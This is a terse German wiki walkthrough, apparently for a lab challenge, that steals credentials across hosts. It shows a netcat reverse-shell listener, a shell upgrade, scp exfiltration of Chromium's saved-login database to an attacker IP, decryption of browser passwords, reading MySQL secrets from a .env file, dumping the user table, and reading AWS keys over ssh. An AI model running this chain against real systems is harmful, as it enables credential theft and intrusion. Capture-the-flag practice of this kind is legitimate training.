security:challenge:exposed_creds
Inhaltsverzeichnis
Find Garry's Password
Start Reverse Shell Listener
root@kali$ nc -l 8000
Enhance Shell
garry@desktop$
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
echo $TERM
stty -a
stty raw -echo
fg
reset
--> xterm
Enable ssh and exfiltrate
garry@desktop$ ssh-keygen -->copy/paste id_rsa.pub -> root@kali scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp
Get Chrome Password
root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
#sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
Decrypting the string: b'v...'
b...e
ssh to intern Server
garry@desktop$ ssh 192.168.6.105
Find Bob's Password
garry@server-intern$
python -c 'import pty; pty.spawn("/bin/bash")'
cat /var/www/app/.env
MYSQL_ROOT_PASSWORD=t..r
MYSQL_USER=d..r
MYSQL_PASSWORD=xxx
MYSQL_DATABASE=xxx
cat /var/www/app/www/conf.php
<?php
$conf = [
'host'=>'localhost',
'user'=>getenv('MYSQL_USER'),
'password'=>getenv('MYSQL_PASSWORD'),
'dbname'=>'intern',
'port'=>3306,
'charset'=>'utf8'
];
?>
cat /var/www/app/www/login.php
// Prepare a select statement
$sql = "SELECT id, username, password FROM users WHERE username = ?";
mysql -h 192.168.6.105 -u root -p intern
-> t..r
mysql> select * from users;
+----+----------+----------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+----------------------------------+---------------------+
| 1 | bob | xxx | 2021-06-26 10:35:43 |
| 2 | garry | xxx | 2021-06-26 10:35:43 |
+----+----------+----------------------------------+---------------------+
google for hash
--> b..7
Find AWS Keys
garry@server-intern$ ssh bob@192.168.6.22 cat /home/bob/.aws/credentials [default] aws_access_key_id = xxx aws_secret_access_key = xxx
security/challenge/exposed_creds.txt · Zuletzt geändert: von wikiadm